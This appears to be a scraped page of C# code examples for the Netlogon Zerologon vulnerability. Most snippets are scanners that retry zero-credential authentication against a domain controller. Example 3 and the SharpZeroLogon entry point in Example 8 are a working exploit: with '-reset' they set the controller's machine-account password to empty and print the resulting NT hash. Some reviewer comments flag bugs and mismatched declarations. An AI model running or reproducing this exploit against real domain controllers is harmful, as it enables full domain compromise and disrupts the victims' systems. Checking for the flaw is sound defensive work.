Ejemplo n.º 1
        /// <summary>
        /// Runs the Netlogon zero-credential check (the one other examples on this page call
        /// Zerologon) against <paramref name="computer"/> and reports the outcome as a single
        /// tab-separated line. Only the challenge and authenticate calls are issued.
        /// </summary>
        /// <param name="computer">
        /// Target name. The text before the first '.' is used as the short name, and the same
        /// text with "$" appended as the account name.
        /// </param>
        /// <returns>
        /// The target name, a tab, then one of: "Vulnerable after N attempts" when an
        /// authenticate call returns 0; "Error 1: hex" when the challenge call fails;
        /// "Error 3: hex" when authenticate fails with anything other than 0xc0000022;
        /// "Error 2: hex" when every attempt was rejected.
        /// </returns>
        protected override string GetCsvData(string computer)
        {
            const int MaxAttempts = 2000;
            // NTSTATUS value the loop treats as "rejected, try again" (access denied).
            const uint AccessDenied = 0xc0000022;

            int negotiateFlags = 0x212fffff;
            int secureChannelType = 6; // the original local was named ServerSecureChannel
            int status = 0;

            string dcName = computer.Split('.')[0];
            string linePrefix = computer + "\t";

            int attempt = 0;
            while (attempt < MaxAttempts)
            {
                // Fresh 8-byte zero credentials for every round.
                var clientCredential = new NETLOGON_CREDENTIAL { data = new byte[8] };
                var serverCredential = new NETLOGON_CREDENTIAL { data = new byte[8] };

                status = I_NetServerReqChallenge(computer, dcName, ref clientCredential, out serverCredential);
                if (status != 0)
                {
                    return linePrefix + "Error 1: " + status.ToString("x");
                }

                status = I_NetServerAuthenticate2(computer, dcName + "$", secureChannelType, dcName, ref clientCredential, out serverCredential, ref negotiateFlags);
                if (status == 0)
                {
                    // The server accepted the zero credential.
                    return linePrefix + "Vulnerable after " + attempt + " attempts";
                }

                if ((uint)status != AccessDenied)
                {
                    // Any failure other than access denied makes the result inconclusive.
                    return linePrefix + "Error 3: " + status.ToString("x");
                }

                attempt++;
            }

            // Reached only when every attempt returned access denied. Despite the "Error 2"
            // label, this is the outcome for a host that never accepted the zero credential.
            return linePrefix + "Error 2: " + status.ToString("x");
        }
Ejemplo n.º 2
 // P/Invoke declaration for the native I_NetServerAuthenticate2 entry point.
 // Returns an int status; the callers shown on this page treat 0 as "authentication accepted".
 // NOTE(review): NegotiateFlags is declared as a 64-bit ulong here, while another declaration
 // of the same function on this page uses int. The Netlogon protocol defines the negotiate
 // flags as a 32-bit value, so confirm the marshalled width against the native prototype.
 // NOTE(review): ServerCredential is `ref` here and `out` in the other declaration; verify
 // which direction the native function expects.
 public static extern int I_NetServerAuthenticate2(
     string PrimaryName,
     string AccountName,
     NETLOGON_SECURE_CHANNEL_TYPE AccountType,
     string ComputerName,
     ref NETLOGON_CREDENTIAL ClientCredential,
     ref NETLOGON_CREDENTIAL ServerCredential,
     ref ulong NegotiateFlags
     );
Ejemplo n.º 3
        /// <summary>
        /// Calls NetServerPasswordSet2 for <paramref name="targetcomputeraccount"/> with two
        /// authenticators whose credential bytes and timestamp are all zero and with a
        /// default-initialized NL_TRUST_PASSWORD, then returns the call's status.
        /// </summary>
        /// <param name="targetcomputeraccount">Account name, marshalled as a Unicode string.</param>
        /// <returns>The value returned by NetServerPasswordSet2, cast to NTSTATUS.</returns>
        /// <remarks>
        /// NOTE(review): unlike the authenticate probe on this page, this call is state-changing.
        /// Judging by its name it replaces the account's stored password, presumably with the
        /// empty value carried by the default NL_TRUST_PASSWORD - confirm against the struct
        /// definition. A successful run therefore leaves the target needing its machine-account
        /// secret restored.
        /// NOTE(review): none of the five unmanaged allocations made here is freed before returning.
        /// </remarks>
        private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
        {
            // Both 8-byte credential buffers are all zero.
            byte[] plaintext  = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
            byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

            NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL
            {
                data = plaintext
            };

            NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL
            {
                data = ciphertext
            };

            // Authenticators wrap the zero credentials with a zero timestamp.
            NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR
            {
                Credential = palintextcred,
                Timestamp  = 0
            };

            NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR
            {
                Credential = chiphertextcred,
                Timestamp  = 0
            };

            // Copy each authenticator into unmanaged memory so it can be passed by pointer.
            IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));

            Marshal.StructureToPtr(plainAuth, pcred, false);

            IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));

            Marshal.StructureToPtr(cipherAuth, ccred, false);

            // Hard-coded client computer name sent with the request. Being a fixed literal,
            // it is a stable artifact of this implementation.
            IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");

            IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);

            // Default-initialized password structure; no field is set before it is marshalled.
            NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD();

            IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass));

            Marshal.StructureToPtr(tpass, ptpass, false);

            // GetStubPtr/GetProcStringPtr are defined elsewhere; 142 presumably selects this
            // procedure's format string - TODO confirm.
            NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass);

            // The cast is redundant: rpcStatus is already an NTSTATUS.
            return((NTSTATUS)rpcStatus);
        }
Ejemplo n.º 4
        /// <summary>
        /// Makes one Netlogon challenge/authenticate attempt with an all-zero 8-byte client
        /// credential for <paramref name="targetcomputeraccount"/> and reports whether the
        /// authenticate call returned NTSTATUS.Success.
        /// </summary>
        /// <param name="targetcomputeraccount">Account name, marshalled as a Unicode string.</param>
        /// <returns>
        /// true only when NetrServerAuthenticate3 returns Success; false for every other status
        /// and whenever the call throws.
        /// </returns>
        /// <remarks>
        /// This is a single attempt; any retrying is presumably done by the caller.
        /// NOTE(review): the three unmanaged allocations made here are never freed.
        /// </remarks>
        private static bool Tryzerologonenticate(string targetcomputeraccount)
        {
            // Both 8-byte credential buffers are all zero.
            byte[] plaintext  = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
            byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

            NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL();

            palintextcred.data = plaintext;

            NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL();

            chiphertextcred.data = ciphertext;

            // Only the client credential is copied to unmanaged memory; the server credential
            // is received through the `out` parameters below.
            IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(palintextcred));

            Marshal.StructureToPtr(palintextcred, pcred, false);

            // NOTE(review): flags is passed as `out` below, so whether this initial value
            // reaches the callee depends on the stub's marshalling - confirm.
            uint flags = 0x212fffff;

            // Hard-coded client computer name used for both calls.
            IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");

            IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);

            // The challenge status is stored but never checked before the authenticate call.
            NTSTATUS rpcStatus = (NTSTATUS)NetrServerReqChallenge(GetStubPtr(), GetProcStringPtr(0), IntPtr.Zero, computernamePtr, pcred, out chiphertextcred);

            uint rid = 0;

            try
            {
                rpcStatus = (NTSTATUS)NetrServerAuthenticate3(GetStubPtr(), GetProcStringPtr(62), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, out chiphertextcred, out flags, out rid);

                if (rpcStatus == NTSTATUS.Success)
                {
                    Console.WriteLine("\n[*]");

                    return(true);
                }
                // Non-success statuses that do not throw fall through silently to `return false`.
            }
            catch (Exception e)
            {
                // NOTE(review): if NetrServerAuthenticate3 throws, the assignment above never
                // completes, so rpcStatus still holds the NetrServerReqChallenge result here.
                // This filter therefore tests the challenge status, not the authenticate status.
                if (rpcStatus != NTSTATUS.AccessDenied)
                {
                    Console.WriteLine("Error: " + e.Message);
                }
            }

            return(false);
        }
Ejemplo n.º 5
 // P/Invoke declaration for the native I_NetServerAuthenticate2 entry point, with the secure
 // channel type passed as a plain int and the negotiate flags as a 32-bit int by reference.
 // Returns an int status; the caller shown on this page treats 0 as "authentication accepted"
 // and 0xc0000022 as "rejected, retry".
 // NOTE(review): ServerCredential is `out` here but `ref` in another declaration of the same
 // function on this page - verify against the native prototype.
 internal static extern int I_NetServerAuthenticate2(string domain, string account, int SecureChannelType, string computername, ref NETLOGON_CREDENTIAL ClientCredential, out NETLOGON_CREDENTIAL ServerCredential, ref int NegotiateFlags);
Ejemplo n.º 6
 // P/Invoke declaration for the native I_NetServerReqChallenge entry point: sends the client
 // challenge and receives the server challenge through the `out` parameter.
 // Returns an int status; the caller shown on this page treats any non-zero value as failure.
 internal static extern int I_NetServerReqChallenge(string domain, string computer, ref NETLOGON_CREDENTIAL ClientChallenge, out NETLOGON_CREDENTIAL ServerChallenge);
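        /// <summary>
        /// Console entry point for a Zerologon check: repeats the Netlogon challenge/authenticate
        /// exchange with default-initialized credentials against one domain controller and prints
        /// whether any attempt was accepted. Only these two calls are issued.
        /// </summary>
        /// <param name="args">
        /// <c>args[0]</c> is the domain controller's FQDN. When it is missing or contains no dot,
        /// the name is requested interactively.
        /// </param>
        static void Main(string[] args)
        {
            recap();

            // A missing argument used to throw IndexOutOfRangeException; an empty value now
            // falls through to the interactive prompt below.
            string Remote_Host = args.Length > 0 ? args[0] : string.Empty;

            while (!Remote_Host.Contains("."))
            {
                Console.WriteLine("[-] Please provide FQDN :");
                string entered = Console.ReadLine();
                if (entered == null)
                {
                    // Standard input is closed, so no name can be obtained.
                    return;
                }
                Remote_Host = entered;
                Console.Clear();
            }

            // Derive the short name from the validated value. Taking it from args[0] tested a
            // different name than the one entered at the prompt, which could produce a false
            // "not vulnerable" verdict.
            string Remote_HostName = Remote_Host.Split('.')[0];

            NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
            NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();

            ulong NegotiateFlags = 0x212fffff;

            Console.WriteLine("[+] Begining auth attempts...");

            Console.Write("[+] Working... ");

            Console.CursorVisible = false;

            int counter = 0;

            Console.WriteLine("\n\n");

            var currConsoleColor = Console.ForegroundColor;

            try
            {
                for (int i = 0; i < 2000; i++)
                {
                    // Four-frame progress spinner, redrawn in place.
                    counter++;
                    switch (counter % 4)
                    {
                    case 0: Console.Write(" /"); counter = 0; break;

                    case 1: Console.Write(" -"); break;

                    case 2: Console.Write(" \\"); break;

                    case 3: Console.Write(" |"); break;
                    }
                    Console.SetCursorPosition(Console.CursorLeft - 2, Console.CursorTop);

                    if (I_NetServerReqChallenge(Remote_Host, Remote_HostName, ref ClientChallenge, ref ServerChallenge) != 0)
                    {
                        Console.WriteLine("[-] Could not complete server challenge. Could be invalid name provided or network issues\n");
                        return;
                    }

                    // NOTE(review): every non-zero status is treated as "retry", so a run that
                    // fails for reasons other than access denied still ends with the
                    // "not vulnerable" message below. Treat that verdict as inconclusive
                    // unless the statuses are checked.
                    if (I_NetServerAuthenticate2(Remote_Host, Remote_HostName + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                                 Remote_HostName, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[+] DC is vulnerable to Zerologon attack.\n");
                        Console.ForegroundColor = currConsoleColor;
                        return;
                    }
                }
            }
            finally
            {
                // Restore the cursor on every exit path, including the early returns above.
                Console.CursorVisible = true;
            }

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("[+] DC appear to not be vulnerable to Zerologon attack.\n");
            Console.ForegroundColor = currConsoleColor;
        }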
Ejemplo n.º 8
        /// <summary>
        /// Console entry point. Repeats the Netlogon challenge/authenticate exchange with
        /// default-initialized credentials against the domain controller named in
        /// <c>args[0]</c>. When an attempt is accepted and <c>-reset</c> was given, it also calls
        /// I_NetServerPasswordSet2 for the controller's machine account.
        /// </summary>
        /// <param name="args">
        /// <c>args[0]</c>: target FQDN. Optional switches anywhere in the list:
        /// <c>-reset</c> and <c>-patch</c>.
        /// </param>
        /// <remarks>
        /// Without <c>-reset</c> the run is limited to the two probe calls. With <c>-reset</c> it
        /// is state-changing: the success message says the machine account password now has the
        /// NT hash of the empty string. NOTE(review): after such a change the target presumably
        /// needs its machine-account secret restored before it interoperates normally - confirm.
        /// </remarks>
        static void Main(string[] args)
        {
            if (args.Length < 1)
            {
                Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
                return;
            }

            bool   reset    = false;
            bool   patch    = false;
            string fqdn     = args[0];
            // Short name is the text before the first '.'; with "$" appended it is used as
            // the account name below.
            string hostname = fqdn.Split('.')[0];

            // Scans every argument, including args[0], for the two switches.
            foreach (string arg in args)
            {
                switch (arg)
                {
                case "-reset":
                    reset = true;
                    break;

                case "-patch":
                    patch = true;
                    break;
                }
            }

            if (patch)
            {
                // PatchLogon is defined elsewhere; going by the message below it changes the
                // RPC transport to ncacn_ip_tcp - TODO confirm what it modifies.
                if (!PatchLogon())
                {
                    Console.WriteLine("Patching failed :(");
                    return;
                }
                Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
            }

            NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
            NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
            ulong NegotiateFlags = 0x212fffff;

            Console.WriteLine("Performing authentication attempts...");

            // Up to 2000 challenge/authenticate rounds; the burst of rejected attempts from a
            // single client is itself an observable pattern on the target.
            for (int i = 0; i < 2000; i++)
            {
                if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
                {
                    Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
                    return;
                }
                Console.Write("=");

                // NOTE(review): any non-zero status is treated as "retry", so failures other
                // than access denied also end in the "probably patched" message.
                if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                             hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
                {
                    Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");

                    // Both structures are default-initialized; nothing is written to them
                    // before the call below.
                    NETLOGON_AUTHENTICATOR authenticator    = new NETLOGON_AUTHENTICATOR();
                    NL_TRUST_PASSWORD      ClearNewPassword = new NL_TRUST_PASSWORD();

                    if (reset)
                    {
                        // State-changing step: only reached with -reset after an accepted
                        // authentication.
                        if (I_NetServerPasswordSet2(
                                fqdn,
                                hostname + "$",
                                NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                hostname,
                                ref authenticator,
                                out _,
                                ref ClearNewPassword
                                ) == 0)
                        {
                            // The printed value is the well-known NT hash of the empty string.
                            Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
                            return;
                        }
                        Console.WriteLine("Failed to reset machine account password");
                    }

                    return;
                }
            }
            Console.WriteLine("\nAttack failed. Target is probably patched.");
        }
Ejemplo n.º 9
 // P/Invoke declaration for the native I_NetServerReqChallenge entry point, with both
 // challenges passed by reference.
 // Returns an int status; the callers shown on this page treat any non-zero value as failure.
 // NOTE(review): ServerChallenge is `ref` here but `out` in another declaration of the same
 // function on this page - verify against the native prototype.
 public static extern int I_NetServerReqChallenge(
     string PrimaryName,
     string ComputerName,
     ref NETLOGON_CREDENTIAL ClientChallenge,
     ref NETLOGON_CREDENTIAL ServerChallenge
     );